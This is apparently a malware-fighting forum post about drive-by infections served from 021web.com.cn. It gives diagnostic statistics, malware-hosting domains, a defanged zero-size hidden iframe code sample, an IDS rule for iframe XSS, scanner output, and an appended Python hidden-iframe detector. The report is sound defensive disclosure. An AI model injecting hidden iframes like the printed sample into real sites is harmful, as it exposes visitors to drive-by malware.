Hi malware fighters,
See unmasked pirates report for 021web*com*cn
Of the 217 pages we tested on the site 2 pages resulted in malicious software being downloaded and installed without user consent. The last time suspicious content was found on this site was on 2010-07-04.
Malicious software includes 1116 exploits, 1101 scripting exploits, 5 trojans. Successful infection resulted in an average of 6 new processes on the target machine.
Malicious software is hosted on 11 domains, including dwefsd.com/, 92mimi4.cn/, wdf345.3322.org/.
This site was hosted on 1 network including AS4812 (CT).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, 021web.com.cn appeared to function as an intermediary for the infection of 246 site(s) including vannghevietnam.vn/, dongnai.gov.vn/, 1081.com.vn/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 185 domains, including vannghevietnam.vn/, dongnai.gov.vn/, vietbalo.vn/.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Infection details:
MD5: 873fab89c387bd0d2225a5689f152e81
Infection Type: IFRAME
Description: A malicious IFRAME can source in content from web pages that attempt to fingerprint and exploit a browser vulnerability or client/OS vulnerability to cause a drive-by-download. Such IFRAMEs are typically invisible to users.
Code Length: 75 bytes
Code Sample:
Top-level URL <iframe src=htxp://021web.com*cn/about.html width=0 height=0>
=== Triggered rule ===
alert(url_content:"%3Ciframe"; nocase; msg:"<iframe> tags GET request cross site scripting attempt"; url_re:"/%3Ciframe.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
=== Request URL ===
htxp://www.google.com/search?client=flock&channel=fds&q=Infection+Details++MD5%3A+%09873fab89c387bd0d2225a5689f152e81+Infection+Type%3A+%09IFRAME+Description%3A+%09A+malicious+IFRAME+can+source+in+content+from+web+pages+that+attempt+to+fingerprint+and+exploit+a+browser+vulnerability+or+client%2FOS+vulnerability+to+cause+a+drive-by-download.+Such+IFRAMEs+are+typically+invisible+to+users.+Code+Length%3A+%0975+bytes+Code+Sample%3A+%09+Top-level+URL+%3Ciframe+src%3Dhttp%3A%2F%2F021web.com.cn%2Fabo+ut.html+width%3D0+height%3D0%3E&ie=utf-8&oe=utf-8&aq=t
If you submit this request, it is flagged by Avast as: S:ScriptPE-inf [Trj]
iFrame detecting scan:
No zeroiframes detected!
Check took 11.38 seconds
(Level: 0) Url checked:
htxp://021web.com.cn
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
htxp://021web.com.cn/template/index_js.html
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
hxtp://021web.com.cn/js/mainad.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
hxtp://021web.com.cn//count/get_count.asp?action=all
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
htxp://s27.cnzz.com/stat.php?id=602762&web_id=602762 (suspicious code see attached image)
Zeroiframes detected on this site: 0
No ad codes identified
Avast Networkshield is your friend and protector here, because we cannot connect there:
polonus
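As an added example (not part of polonus's post, nor the code of the Google diagnostic or the zeroiframe scanner he used), here is a small stdlib-only Python check for the kind of zero-size or CSS-hidden iframe described in the infection details above; the sample page and its domain names are constructed placeholders.

```python
import re
from html.parser import HTMLParser

# Anything this many px or smaller is treated as invisible (a 1x1 frame hides as well as 0x0).
HIDDEN_MAX_PX = 2
_PX = re.compile(r"\s*(\d+)\s*(?:px)?\s*$")                      # "0", "1px"
_CSS_HIDE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
_CSS_DIM = re.compile(r"\b(width|height)\s*:\s*(\d+)\s*(?:px)?", re.I)

class HiddenIframeFinder(HTMLParser):
    """Collects <iframe> tags whose attributes or inline style make them invisible."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":           # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        for name in ("width", "height"):
            m = _PX.match(a.get(name, ""))
            if m and int(m.group(1)) <= HIDDEN_MAX_PX:
                reasons.append(f"{name}={m.group(1)}")
        style = a.get("style", "")
        if _CSS_HIDE.search(style):
            reasons.append("css-hidden")
        for prop, num in _CSS_DIM.findall(style):
            if int(num) <= HIDDEN_MAX_PX:
                reasons.append(f"css-{prop.lower()}={num}")
        if reasons:
            self.findings.append({"src": a.get("src", ""), "reasons": reasons})

def find_hidden_iframes(html):
    """Return a list of {'src', 'reasons'} dicts, one per hidden iframe, in document order."""
    p = HiddenIframeFinder()
    p.feed(html)
    p.close()
    return p.findings

# Constructed sample page (placeholder domains): one visible embed, one 0x0 iframe written
# in the unquoted style quoted in the post, and one hidden through inline CSS.
SAMPLE_HTML = """<html><body>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
<iframe src=http://injected.example/about.html width=0 height=0>
<div><iframe src="https://other.example/x.html" style="display:none;width:1px"></iframe></div>
</body></html>"""
```

Legitimate pages also use hidden iframes (analytics, login frames), so treat a hit as a lead to inspect the src, not as a verdict on its own.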